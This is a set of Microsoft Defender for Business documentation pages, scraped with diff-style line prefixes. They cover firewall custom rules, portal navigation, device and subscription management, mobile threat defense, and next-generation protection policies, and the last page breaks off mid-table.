security Mdb Firewall https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-firewall.md
- Title: Firewall in Microsoft Defender for Business
-description: Learn about Windows Defender Firewall settings in Defender for Business. Firewall can help prevent unwanted network traffic from flowing to your company devices.
----- Previously updated : 05/04/2023---- SMB-- m365-security-- tier1--
-# Firewall in Microsoft Defender for Business
-
-Defender for Business includes firewall capabilities through [Windows Defender Firewall](/windows/security/threat-protection/windows-firewall/windows-firewall-with-advanced-security). Firewall protection helps secure devices by establishing rules that determine what network traffic is permitted to flow to and from devices.
-
-You can use firewall protection to specify whether to allow or to block connections on devices in various locations. For example, your firewall settings can allow inbound connections on devices that are connected to your company's internal network but prevent connections when the device is on a network with untrusted devices.
-
-**This article describes**:
--- [How to view or edit your firewall policies and custom rules](#view-or-edit-your-firewall-policies-and-custom-rules)-- [Default firewall settings in Defender for Business](#default-firewall-settings-in-defender-for-business)-- [Firewall settings you can configure in Defender for Business](#firewall-settings-you-can-configure-in-defender-for-business)-
-## View or edit your firewall policies and custom rules
-
-Depending on whether you're using the Microsoft Defender portal or Intune to manage your firewall protection, use one of the following procedures.
-
-| Portal | Procedure |
-|:|:|
-| Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) |1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.<br/>2. In the navigation pane, choose **Device configuration**. Policies are organized by operating system and policy type.<br/>3. Select an operating system tab (such as **Windows clients**).<br/>4. Expand **Firewall** to view your list of policies.<br/>5. Select a policy to view the details. <br/><br/>To make changes or to learn more about policy settings, see the following articles:<br/>- [View or edit device policies](mdb-view-edit-policies.md)<br/>- [Firewall settings](mdb-firewall.md)<br/>- [Manage your custom rules for firewall policies](mdb-firewall.md) |
-| Microsoft Intune admin center ([https://intune.microsoft.com](https://intune.microsoft.com)) |1. Go to [https://intune.microsoft.com](https://intune.microsoft.com) and sign in. You're now in the Intune admin center.<br/>2. Select **Endpoint security**.<br/>3. Select **Firewall** to view your policies in that category. Custom rules that are defined for firewall protection are listed as separate policies. <br/><br/>For help with managing your security settings in Intune, start with [Manage endpoint security in Microsoft Intune](/mem/intune/protect/endpoint-security).|
-
-## Manage your custom rules for firewall policies in Microsoft Defender for Business
-
-You can use custom rules to define exceptions for your firewall policies. That is, you can use custom rules to block or allow specific connections.
-
-### Create a custom rule for a firewall policy
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Endpoints** > **Device configuration**, and review the list of policies.
-
-3. In the **Firewall** section, select an existing policy, or add a new policy.
-
-4. On the **Configuration settings** step, review the settings. Make any needed changes to **Domain network**, **Public network**, and **Private network**.
-
-5. To create a custom rule, follow these steps:
-
- 1. Under **Custom rules**, choose **+ Add rule**. (You can have up to 150 custom rules.)
- 2. On the **Create new rule** flyout, specify a name and description for the rule.
- 3. Select a profile. (Your options include **Domain network**, **Public network**, or **Private network**.)
- 4. In the **Remote address type** list, select either **IP** or **Application file path**.
- 5. In the **Value** box, specify an appropriate value. Depending on what you selected in step 6d, you might specify an IP address, an IP address range, or an application file path. (See [Firewall settings](mdb-firewall.md).)
- 6. On the **Create new rule** flyout, select **Create rule**.
-
-6. On the **Configuration settings** screen, choose **Next**.
-
-7. On the **Review your policy** screen, review the changes that were made to firewall policy settings. Make any needed changes, and then choose **Create policy**.
-
-### Edit a custom rule for a firewall policy
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Endpoints** > **Device configuration**, and review the list of policies.
-
-3. In the **Firewall** section, select an existing policy, or add a new policy.
-
-4. Under **Custom rules**, review the list of rules.
-
-5. Select a rule, and then choose **Edit**. Its flyout opens.
-
-6. To edit your custom rule, follow these steps:
-
- 1. On the **Edit rule** flyout, review and edit the rule's name and description.
- 2. Review and if necessary, edit the rule's profile. (Your options include **Domain network**, **Public network**, or **Private network**.)
- 3. In the **Remote address type** list, select either **IP** or **Application file path**.
- 4. In the **Value** box, specify an appropriate value. Depending on what you selected in step 6c, you might specify an IP address, an IP address range, or an application file path. (See [Firewall settings](mdb-firewall.md).)
- 5. Set **Enable rule** to **On** to make the rule active. Or, to disable the rule, set the switch to **Off**.
- 6. On the **Edit rule** flyout, select **Update rule**.
-
-7. On the **Configuration settings** screen, choose **Next**.
-
-8. On the **Review your policy** screen, review the changes that were made to firewall policy settings. Make any needed changes, and then choose **Create policy**.
-
-### Delete a custom rule
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Endpoints** > **Device configuration**, and review the list of policies.
-
-3. In the **Firewall** section, select an existing policy, or add a new policy.
-
-4. Under **Custom rules**, review the list of rules.
-
-5. Select a rule, and then choose **Delete**. Its flyout opens.
-
-6. On the confirmation screen, choose **Delete**.
-
-## Default firewall settings in Defender for Business
-
-Defender for Business includes default firewall policies and settings to help protect your company's devices from day one. As soon as your company's devices are onboarded to Defender for Business, your default firewall policy works as follows:
--- Outbound connections from devices are allowed by default, regardless of location.-- When devices are connected to your company's network, all inbound connections are blocked by default.-- When devices are connected to a public network or a private network, all inbound connections are blocked by default.-
-In Defender for Business, you can define exceptions to block or allow incoming connections. You define these exceptions by creating [custom rules](#manage-your-custom-rules-for-firewall-policies-in-microsoft-defender-for-business).
-
-## Firewall settings you can configure in Defender for Business
-
-Defender for Business includes firewall protection through Windows Defender Firewall. The following table lists settings that can be configured in Defender for Business.
-
-| Setting | Description |
-|--|--|
-| **Domain network** | The domain network profile applies to your company's network. Firewall settings for your domain network apply to inbound connections that are initiated on other devices on the same network. By default, incoming connections is set to **Block all**. |
-| **Public network** | The public network profile applies to networks that you can use in a public location, such as a coffee shop or airport. Firewall settings for public networks apply to inbound connections that are initiated on other devices on the same network. Because a public network can include devices that you don't know or don't trust, incoming connections is set to **Block all** by default. |
-| **Private network** | The private network profile applies to networks in a private location, such as your home. Firewall settings for private networks apply to inbound connections that are initiated on other devices on the same network. In general, on a private network, it's assumed that all other devices on the same network are trusted devices. However, by default, incoming connections is set to **Block all**. |
-| **Custom rules** | [Custom rules](mdb-firewall.md) let you block or allow specific connections. For example, suppose that you want to block all incoming connections on devices that are connected to a private network except for connections through a specific app on a device. In this case, you'd set **Private network** to block all incoming connections, and then add a custom rule to define the exception. <p>You can use custom rules to define exceptions for specific files or apps, an Internet protocol (IP) address, or a range of IP addresses. Depending on the type of custom rule you're creating, here are some examples of values you could use: <br/>- Application file path: `C:\Windows\System\Notepad.exe or %WINDIR%\Notepad.exe` <br/>- IP: A valid IPv4/IPv6 address, such as `192.168.11.0` or `192.168.1.0/24` <br/>- IP: A valid IPv4/IPv6 address range, formatted like `192.168.1.0-192.168.1.9` (with no spaces included) |
-
-## Next steps
--- [Manage firewall settings in Defender for Business](mdb-firewall.md)-- [Learn more about Windows Defender Firewall](/windows/security/threat-protection/windows-firewall/windows-firewall-with-advanced-security)-- [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md)-- [Respond to and mitigate threats in Defender for Business](mdb-respond-mitigate-threats.md)-- [Review remediation actions in the Action center](mdb-review-remediation-actions.md)-
security Mdb Get Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-get-started.md
- Title: Visit the Microsoft Defender portal
-description: Your security center in Defender for Business is the Microsoft Defender portal. Learn how to navigate the portal, and see your next steps.
----- Previously updated : 04/10/2024---- SMB-- m365-security-- m365-initiative-defender-business-- tier1-- essentials-get-started---
-# Visit the Microsoft Defender portal
-
-The Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) is your one-stop shop for using and managing Microsoft Defender for Business. It includes callouts to help you get started, cards that surface relevant information, and a navigation bar to give you easy access to various features and capabilities.
--
-## The navigation bar
-
-Use the navigation bar on the left side of the screen to access your incidents, view reports, and manage your security policies. The following table describes items you'll see in your navigation bar.
-
-| Item | Description |
-|:|:|
-| **Home** | Takes you to your home page in the Microsoft Defender portal. The home page highlights any active threats that are detected, along with recommendations to help secure your company's data and devices. Recommendations are included in Defender for Business to save your security team time and effort. The recommendations are based on industry best practices. To learn more, see [Security recommendations - Microsoft Defender Vulnerability Management](../defender-endpoint/tvm-security-recommendation.md). |
-| **Incidents & alerts** > **Incidents** | Takes you to your list of recent incidents. As alerts are triggered, incidents are created. An incident can include multiple alerts. Make sure to review your incidents regularly. To learn more, see [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md).|
-| **Actions & submissions** > **Action center** | Takes you to your list of response actions, including completed and pending actions.<br/>- Select the **Pending** tab to view actions that require approval to proceed.<br/>- Select the **History** tab to see the actions that were taken. Some actions are taken automatically; others are taken manually or complete after they're approved.<br/><br/>To learn more, see [Review remediation actions in the Action center](mdb-review-remediation-actions.md). |
-| **Actions & submissions** > **Submissions** | Takes you to the unified submissions portal, where you can submit files to Microsoft for analysis. To learn more, see [Submit files in Microsoft Defender for Endpoint](../defender-endpoint/admin-submissions-mde.md) (the process is similar for Defender for Business). |
-| **Secure score** | Provides a representation of your company's security position and offers suggestions to improve it. To learn more, see [Microsoft Secure Score for Devices](../defender-endpoint/tvm-microsoft-secure-score-devices.md). |
-| **Learning hub** | Provides access to security training and other resources through learning paths that are included with your subscription. You can filter by product, skill level, role, and more. The Learning hub can help your security team ramp up on security features and capabilities in Defender for Business and more Microsoft offerings, such as [Microsoft Defender for Endpoint](../defender-endpoint/microsoft-defender-endpoint.md) and [Microsoft Defender for Office 365](../office-365-security/defender-for-office-365.md). |
-| **Trials** | Try additional security and compliance capabilities by adding on a trial subscription. If you do not see **Trials** in your navigation bar, and you want to add on another trial, you can take one of the following steps: <br/>- Visit the [Small Business Solutions page](https://www.microsoft.com/en-us/store/b/business?icid=CNavBusinessStore), and choose **Questions? Talk to an expert** to get some help adding on a trial subscription. <br/>- Go to the [Microsoft 365 admin center](https://admin.microsoft.com/?auth_upn=admin%40M365B614031.onmicrosoft.com&source=applauncher#/catalog), and choose **Billing** > **Purchase services**. If you need help, choose **Help & support**. |
-| **Partner catalog** | Lists Microsoft partners who provide technical and professional services. |
-| **Assets** > **Devices** | Enables you to view devices, such as computers and mobile devices that are enrolled in [Microsoft Intune](/mem/intune/fundamentals/what-is-intune). |
-| **Endpoints** > **Vulnerability management** | Enables you to access your [Microsoft Defender Vulnerability Management](../defender-vulnerability-management/defender-vulnerability-management.md) capabilities. Provides a dashboard, recommendations, remediation activities, a software inventory, and a list of potential weaknesses within your company. |
-| **Endpoints** > **Tutorials** | Provides access to walkthroughs and simulations to help you learn more about how your threat protection features work. Select the **Read the walkthrough** link before attempting to get the simulation file for each tutorial. Some simulations require Office apps, such as Microsoft Word, to read the walkthrough. |
-| **Endpoints** > **Configuration management** > **Device configuration** | Lists your security policies by operating system and by type. To learn more about your security policies, see [View or edit policies in Defender for Business](mdb-view-edit-policies.md). |
-| **Endpoints** > **Configuration management** > **Device management reporting** | Lists devices that are onboarded to Defender for Business, along with their operating system version, sensor health state, and when they were last updated. |
-| **Email & collaboration** > **Policies & rules** | If your subscription includes Exchange Online Protection or Microsoft Defender for Office 365, this section is where you'll manage your security policies and settings for email and collaboration services. [Learn more about Office 365 security](/microsoft-365/security/office-365-security/defender-for-office-365). *The standalone version of Defender for Business does not include email & collaboration policies, but Microsoft 365 Business Premium does include Exchange Online Protection and Defender for Office 365 Plan 1*. |
-| **Cloud apps** > **App governance** | If your subscription includes [Microsoft Defender for Cloud Apps](/defender-cloud-apps/what-is-defender-for-cloud-apps), you can add on [app governance](/defender-cloud-apps/app-governance-manage-app-governance), and this section is where you'll view and access those capabilities. *Defender for Business and Microsoft 365 Business Premium do not include Defender for Cloud Apps*. |
-| **Reports** | Lists available security reports. These reports enable you to see your security trends, view details about threat detections and alerts, and learn more about your company's vulnerable devices. |
-| **Health** | Enables you to view your service health status and plan for upcoming changes. <br/>- Select **Service health** to view the health status of the Microsoft 365 services that are included in your company's subscription.<br/>- Select **Message center** to learn about planned changes and what to expect. |
-| **Permissions** | Enables you to assign permissions to the people in your company who manage your security and to view incidents and reports in the Microsoft Defender portal. Also enables you to set up and manage device groups to onboard your company's devices and assign threat protection policies. |
-| **Settings** | Enables you to edit settings for the Microsoft Defender portal and Defender for Business. For example, you can onboard (or offboard) your company's devices (also referred to as endpoints). You can also define rules, such as alert-suppression rules, and set up indicators to block or allow certain files or processes. |
-| **More resources** | Navigate to other portals, such as Microsoft Entra ID. But keep in mind that the Microsoft Defender portal should meet your needs without requiring you to navigate to other portals. |
-| **Customize your navigation pane** | Select this option to hide or display options in your navigation bar. |
-
-## Next steps
--- [See the overall setup and configuration process](mdb-setup-configuration.md)-
security Mdb Lighthouse Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-lighthouse-integration.md
- Title: Microsoft 365 Lighthouse and Microsoft Defender for Business
-description: See how Microsoft Defender for Business integrates with Microsoft 365 Lighthouse, a security solution for Microsoft partners.
----- Previously updated : 09/28/2022---- SMB-- m365-security-- tier1--
-# Microsoft 365 Lighthouse and Microsoft Defender for Business
-
-## Microsoft Defender for Business integrates with Microsoft 365 Lighthouse
-
-If you're a Microsoft Cloud Solution Provider (CSP) or Managed Service Provider (MSP), you can use [Microsoft 365 Lighthouse](../../lighthouse/m365-lighthouse-overview.md) to manage security for your customers. Microsoft Defender for Business and Defender for Endpoint integrate with Microsoft 365 Lighthouse, an admin portal that CSPs and MSPs can use to secure and manage their customers' data and devices.
--
- You can use the Microsoft 365 Lighthouse portal ([https://lighthouse.microsoft.com](https://lighthouse.microsoft.com)) to:
--- Manage your customers' security settings and capabilities. -- View and manage detected threats across your customers' tenants.-- Initiate antivirus scans on customers' devices to keep them up to date and protected.-
-## Learn more about Microsoft 365 Lighthouse
-
-Microsoft 365 Lighthouse enables Microsoft CSPs and MSPs to secure and manage devices, data, and users at scale.
-
-To learn more, see:
--- [Overview of Microsoft 365 Lighthouse](../../lighthouse/m365-lighthouse-overview.md)-- [Requirements for Microsoft 365 Lighthouse](../../lighthouse/m365-lighthouse-requirements.md)-- [Sign up for Microsoft 365 Lighthouse](../../lighthouse/m365-lighthouse-sign-up.md)-
-## See also
-
-[Microsoft Defender for Business and managed service provider resources](mdb-partners.md) (provides information about RMM and PSA integration for MSPs)
security Mdb Manage Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-manage-devices.md
- Title: Manage devices in Microsoft Defender for Business
-description: Learn how to add, remove, and manage devices in Defender for Business, endpoint protection for small and medium sized businesses.
----- Previously updated : 05/10/2023---- SMB-- m365-security-- m365-initiative-defender-business-- tier1--
-# Manage devices in Microsoft Defender for Business
-
-In Defender for Business, you can manage devices as follows:
--- [View a list of onboarded devices](#view-the-list-of-onboarded-devices) to see their risk level, exposure level, and health state-- [Take action on a device](#take-action-on-a-device-that-has-threat-detections) that has threat detections-- [View the state of Microsoft Defender Antivirus](#view-the-state-of-microsoft-defender-antivirus)-- [Onboard a device to Defender for Business](#onboard-a-device) -- [Offboard a device from Defender for Business](#offboard-a-device)-
-## View the list of onboarded devices
--
-> [!IMPORTANT]
-> In order to view the list of onboarded devices, you must have one of the following [roles](mdb-roles-permissions.md) assigned:
->
-> - Global Administrator
-> - Security Administrator
-> - Security Reader
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation pane, go to **Assets** > **Devices**.
-
-3. Select a device to open its flyout panel, where you can learn more about its status and take action.
-
- If you don't have any devices listed yet, [Onboard devices to Defender for Business](mdb-onboard-devices.md)
-
-## Take action on a device that has threat detections
--
-> [!IMPORTANT]
-> In order to take action on a device with detected threats, you must have one of the following [roles](mdb-roles-permissions.md) assigned:
->
-> - Global Administrator
-> - Security Administrator
-
-1. In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), in the navigation pane, go to **Assets** > **Devices**.
-
-2. Select a device to open its flyout panel, and review the information that is displayed.
-
-3. Select the ellipsis (**...**) to open the actions menu.
-
-4. Select an action, such as **Run antivirus scan** or **Initiate Automated Investigation**.
-
-## View the state of Microsoft Defender Antivirus
-
-Microsoft Defender Antivirus is a key component of next-generation protection in Defender for Business. When devices are onboarded to Defender for Business, Microsoft Defender Antivirus can have one of the following states:
--- Active mode-- Passive mode-- Disabled (or uninstalled) mode-
-To view the state of Microsoft Defender Antivirus, you can choose from several options, such as:
--- Reports, like the [Device health report](mdb-reports.md#device-health-report); or-- One of the methods described in [How to confirm the state of Microsoft Defender Antivirus](../defender-endpoint/microsoft-defender-antivirus-compatibility.md#how-to-confirm-the-state-of-microsoft-defender-antivirus).-
-The following table describes each state and what it means.
-
-| Microsoft Defender Antivirus state | What it means |
-|:|:|
-| **Active mode** <br/>(*recommended*) | Microsoft Defender Antivirus is used as the antivirus app on the machine. Files are scanned, threats are remediated, and detection information is reported in the Microsoft Defender portal and in the Windows Security app on a device running Windows.<br/><br/>We recommend running Microsoft Defender Antivirus in active mode so that devices onboarded to Defender for Business will get all of the following types of protection: <br/>- **Real-time protection**, which locates and stops malware from running on devices. <br/> - **Cloud protection**, which works with Microsoft Defender Antivirus and the Microsoft cloud to identify new threats, sometimes even before a single device is affected.<br/> - **Network protection**, which helps protect against phishing scams, exploit-hosting sites, and malicious content on the internet.<br/> - **Web content filtering**, which regulates access to websites based on content categories (such as adult content, high bandwidth, and legal liability) across all browsers.<br/> - **Protection from potentially unwanted applications**, such as advertising software, bundling software that offers to install other, unsigned software, and evasion software that attempts to evade security features. |
-| **Passive mode** | A non-Microsoft antivirus/antimalware product is installed on the device, and even though the device has been onboarded to Defender for Business, Microsoft Defender Antivirus can detect threats but doesn't remediate them. Devices with Microsoft Defender Antivirus can still receive security intelligence and platform updates. <br/><br/>You can switch Microsoft Defender Antivirus to active mode automatically by uninstalling the non-Microsoft antivirus/antimalware product. |
-| **Disabled mode** | A non-Microsoft antivirus/antimalware product is installed on the device, and the device hasn't been onboarded to Defender for Business. Whether Microsoft Defender Antivirus went into disabled mode automatically or was set manually, it's not currently running on the device. In this case, Microsoft Defender Antivirus neither detects nor remediates threats on the device.<br/><br/>You can switch Microsoft Defender Antivirus to active mode by uninstalling the non-Microsoft antivirus/antimalware solution and onboarding the device to Defender for Business. |
-
-## Onboard a device
-
-See [Onboard devices to Defender for Business](mdb-onboard-devices.md).
-
-## Offboard a device
-
-See [Offboarding a device](mdb-offboard-devices.md).
-
-## Next steps
--- [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md)-- [Respond to and mitigate threats in Defender for Business](mdb-respond-mitigate-threats.md)-- [Review remediation actions in the Action center](mdb-review-remediation-actions.md)-- [Create or edit device groups](mdb-create-edit-device-groups.md)-
security Mdb Manage Subscription https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-manage-subscription.md
- Title: Change your endpoint security subscription
-description: Learn about your options for managing your Defender for Business or Defender for Endpoint subscription settings. Choose between Defender for Endpoint or Defender for Business.
---- Previously updated : 01/03/2024----- M365-security-compliance-- m365initiative-defender-business-- essentials-manage--
-# Change your endpoint security subscription
-
-[Microsoft Defender for Business](mdb-overview.md) and [Microsoft Defender for Endpoint](../defender-endpoint/microsoft-defender-endpoint.md) are endpoint security subscriptions that your organization can use to protect devices, such as computers, tablets, and phones. As your organization grows, you might have a mix of subscriptions and licenses. For example, you might have some Defender for Business licenses, and some Defender for Endpoint licenses.
-
-This article describes how to apply either Defender for Business or Defender for Endpoint Plan 2 features and capabilities across all your organization's devices. (To learn more about mixed-licensing scenarios with Defender for Endpoint Plan 1 and Plan 2, see [Manage Microsoft Defender for Endpoint subscription settings across client devices](../defender-endpoint/defender-endpoint-subscription-settings.md).)
-
-## Before you begin
--- You should have active trial or paid licenses for both Defender for Business and Defender for Endpoint Plan 2. --- If you're using Defender for Business only, you can continue using it. In this case, no changes are needed. But if you're considering switching to Defender for Endpoint Plan 2, follow the guidance in this article.-- To access license information, you must have one of the following roles assigned in Microsoft Entra ID:
-
- - Global Admin
- - Security Admin
-
-## View and manage your endpoint security subscription settings
-
-1. As an admin, go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Settings** > **Endpoints** > **Licenses**. Your usage report opens and displays information about your organization's Defender for Business and Defender for Endpoint licenses.
-
-3. To change your subscription, under **Subscriptions applied to your devices**, select **Change subscription settings**.
-
- > [!NOTE]
- > If you don't see **Change subscription settings**, at least one of the following conditions is true:
- > - You have Defender for Business or Defender for Endpoint (but not both)
- > - You don't have enough Defender for Endpoint Plan 2 licenses for all users in your organization
- > - The ability to change your subscription settings hasn't rolled out to your organization yet
-
-4. On the **Subscription settings** flyout, choose whether to use only Defender for Business or Defender for Endpoint Plan 2 across your organization's devices.
-
- > [!IMPORTANT]
- > Keep the following important points in mind before you save your changes:
- >
- > - Make sure you have enough licenses for the subscription you're using for all users in your organization.
- > - If you select **Only Microsoft Defender for Endpoint Plan 2**, the simplified configuration experience for Defender for Business is replaced with advanced settings that you can configure in Defender for Endpoint. If this change is applied, you can't undo it.
- > - It can take up to three hours for your changes to be applied.
- > - Make sure to review your security policies and settings. To get help with Defender for Endpoint policies and settings, see [Configure Defender for Endpoint capabilities](../defender-endpoint/onboard-configure.md). To get help with Defender for Business policies and settings, see [Review and edit your security policies and settings in Defender for Business](mdb-configure-security-settings.md).
-
-## Review license usage
-
-The license usage report is estimated based on sign-in activities on the device. Defender for Endpoint Plan 2 licenses are assigned to users, and each user can have up to five concurrent, onboarded devices. To learn more about license terms, see [Microsoft Licensing](https://www.microsoft.com/en-us/licensing/default).
-
-To reduce management overhead, there's no requirement for device-to-user mapping and assignment. Instead, the license report provides a utilization estimation that is calculated based on device usage seen across your organization. It might take up to one day for your usage report to reflect the active usage of your devices.
-
-> [!IMPORTANT]
-> To access license information, you must have one of the following roles assigned in Microsoft Entra ID:
-> - Security Admin
-> - Global Admin
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Choose **Settings** > **Endpoints** > **Licenses**.
-
-3. Review your available and assigned licenses. The calculation is based on detected users who have accessed devices that are onboarded to Defender for Business (or Defender for Endpoint).
-
-## More information
--- [Licensing and product terms for Microsoft 365 subscriptions](https://www.microsoft.com/licensing/terms/productoffering/Microsoft365/MCA).-- [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business/mdb-overview) (endpoint protection for small and medium-sized businesses)-
security Mdb Mtd https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-mtd.md
- Title: Mobile threat defense capabilities in Microsoft Defender for Business
-description: Get an overview of mobile threat defense in Defender for Business. Learn about what's included and how to onboard devices.
--- Previously updated : 07/19/2023----- SMB-- m365-security-- m365-initiative-defender-business-- tier1---
-# Mobile threat defense capabilities in Microsoft Defender for Business
-
-Microsoft Defender for Business provides advanced threat protection capabilities for devices, such as Windows and Mac clients. **Defender for Business capabilities now include mobile threat defense**! Mobile threat defense capabilities help protect Android and iOS devices, without requiring you to use Microsoft Intune to onboard mobile devices.
-
-In addition, mobile threat defense capabilities integrate with [Microsoft 365 Lighthouse](../../lighthouse/m365-lighthouse-overview.md), where Cloud Solution Providers (CSPs) can view information about vulnerable devices and help mitigate detected threats.
-
-## What's included in mobile threat defense?
-
-The following table summarizes the capabilities that are included in mobile threat defense in Defender for Business:
-
-| Capability | Android | iOS |
-|:|:|:|
-| **Web Protection** <br/>Anti-phishing, blocking unsafe network connections, and support for custom indicators. <br/>Web protection is turned on by default with [web content filtering](mdb-web-content-filtering.md). | :::image type="content" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" alt-text="Included checkmark."::: | :::image type="content" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" alt-text="Included checkmark."::: |
-| **Malware protection** (Android-only) <br/>Scanning for malicious apps. | :::image type="content" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" alt-text="Included checkmark."::: | No |
-| **Jailbreak detection** (iOS-only) <br/>Detection of jailbroken devices. | No | :::image type="content" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" alt-text="Included checkmark."::: |
-| **Microsoft Defender Vulnerability Management**<br/>Vulnerability assessment of onboarded mobile devices. Includes vulnerability assessments for operating systems and apps for Android and iOS. <br/>See [Use your vulnerability management dashboard in Microsoft Defender for Business](mdb-view-tvm-dashboard.md). | :::image type="content" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" alt-text="Included checkmark."::: | See note 1 (below) |
-| **Network Protection** <br/>Protection against rogue Wi-Fi related threats and rogue certificates. <br/>Network protection is turned on by default with [next-generation protection](mdb-next-generation-protection.md). <br/>As part of mobile threat defense, network protection also includes the ability to allow root certification authority and private root certification authority certificates in Intune. It also establishes trust with endpoints. | See note 2 (below) | See note 2 (below) |
-| **Unified alerting** <br/>Alerts from all platforms are listed in the unified Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). In the navigation pane, choose **Incidents**). <br/>See [View and manage incidents in Microsoft Defender for Business](mdb-view-manage-incidents.md) | :::image type="content" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" alt-text="Included checkmark."::: | :::image type="content" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" alt-text="Included checkmark."::: |
-| **Conditional Access** and **conditional launch** <br/>[Conditional Access](/mem/intune/protect/conditional-access) and [conditional launch](/mem/intune/apps/app-protection-policies-access-actions) block risky devices from accessing corporate resources.<br/>- Conditional Access policies require certain criteria to be met before a user can access company data on their mobile device. <br/>- Conditional launch policies enable your security team to block access or wipe devices that don't meet certain criteria.<br/>Defender for Business risk signals can also be added to app protection policies. | Requires Intune <br/>(see note 3 below) | Requires Intune <br/>(see note 3 below) |
-| **Privacy controls** <br/>Configure privacy in threat reports by controlling the data sent by Defender for Business. Privacy controls are available for admin and end users, and for both enrolled and unenrolled devices. | Requires Intune (see note 3 below) | Requires Intune (see note 3 below) |
-| **Integration with Microsoft Tunnel** <br/>Integration with [Microsoft Tunnel](/mem/intune/protect/microsoft-tunnel-overview), a VPN gateway solution for Intune. | Requires Intune VPN Tunnel <br/>(see note 4 below) | Requires Intune VPN Tunnel <br/>(see note 4 below) |
-
-> [!NOTE]
-> 1. Intune is required for software/app vulnerabilities to be reported. Operating system vulnerabilities are included by default.
->
-> 2. Intune is required to configure or manage an allow list of root certification authority and private root certification authority certificates.
->
-> 3. Intune is included in [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md). Intune can be added on to Defender for Business.
->
-> 4. See [Prerequisites for the Microsoft Tunnel in Intune](/mem/intune/protect/microsoft-tunnel-prerequisites).
->
-
-## How to get mobile threat defense capabilities
-
-Mobile threat defense capabilities are now generally available to [Defender for Business](get-defender-business.md) customers. Here's how to get these capabilities for your organization:
-
-1. Make sure that Defender for Business has finished provisioning. In the [Microsoft Defender portal](https://security.microsoft.com), go to **Assets** > **Devices**.
-
- - If you see a message that says, "Hang on! We're preparing new spaces for your data and connecting them," it means that Defender for Business hasn't finished provisioning. This process is happening now, and can take up to 24 hours to complete.
- - If you see a list of devices, or you're prompted to onboard devices, it means Defender for Business provisioning has completed.
-
-2. Review, and if necessary, edit your [next-generation protection policies](mdb-next-generation-protection.md).
-
-3. Review, and if necessary, edit your [firewall policies and custom rules](mdb-firewall.md).
-
-4. Review, and if necessary, edit your [web content filtering](mdb-web-content-filtering.md) policy.
-
-5. To onboard mobile devices, see the "Use the Microsoft Defender app" procedures in [Onboard devices to Microsoft Defender for Business](mdb-onboard-devices.md).
-
-## See also
--- [Set up and configure Microsoft Defender for Business](mdb-setup-configuration.md)-- [View and edit security policies and settings in Microsoft Defender for Business](mdb-configure-security-settings.md)-- [What's new in Microsoft 365 Business Premium and Microsoft Defender for Business](../../business-premium/m365bp-mdb-whats-new.md)-
security Mdb Next Generation Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-next-generation-protection.md
- Title: Review or edit your next-generation protection policies Microsoft Defender for Business
-description: Learn how to view and edit your next-generation protection policies in Defender for Business. These policies pertain to antivirus and anti-malware protection.
----- Previously updated : 06/30/2023---- SMB-- m365-security-- tier1--
-# Review or edit your next-generation protection policies in Microsoft Defender for Business
-
-In Defender for Business, next-generation protection includes robust antivirus and antimalware protection for computers and mobile devices. Default policies with recommended settings are included in Defender for Business. The default policies are designed to protect your devices and users without hindering productivity. However, you can customize your policies to suit your business needs.
-
-You can choose from several options for managing your next-generation protection policies:
--- Use the Microsoft Defender portal at [https://security.microsoft.com](https://security.microsoft.com) (recommended if you're using the standalone version of Defender for Business without Intune); or -- Use the Microsoft Intune admin center at [https://intune.microsoft.com](https://intune.microsoft.com) (available if your subscription includes Intune)-
-<a name='microsoft-365-defender-portal'></a>
-
-## [**Microsoft Defender portal**](#tab/M365D)
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, go to **Configuration management** > **Device configuration**. Policies are organized by operating system and policy type.
-
-3. Select an operating system tab (such as **Windows**).
-
-4. Expand **Next-generation protection** to view your list of policies. At a minimum, a default policy using recommended settings is listed. This default policy is assigned to all onboarded devices running operating system you selected in the previous step (such as **Windows**). You can:
-
- - Keep your default policy as currently configured.
- - Edit your default policy to make any needed adjustments.
- - Create a new policy.
-
-5. Use one of the procedures in the following table:
-
- | Task | Procedure |
- |||
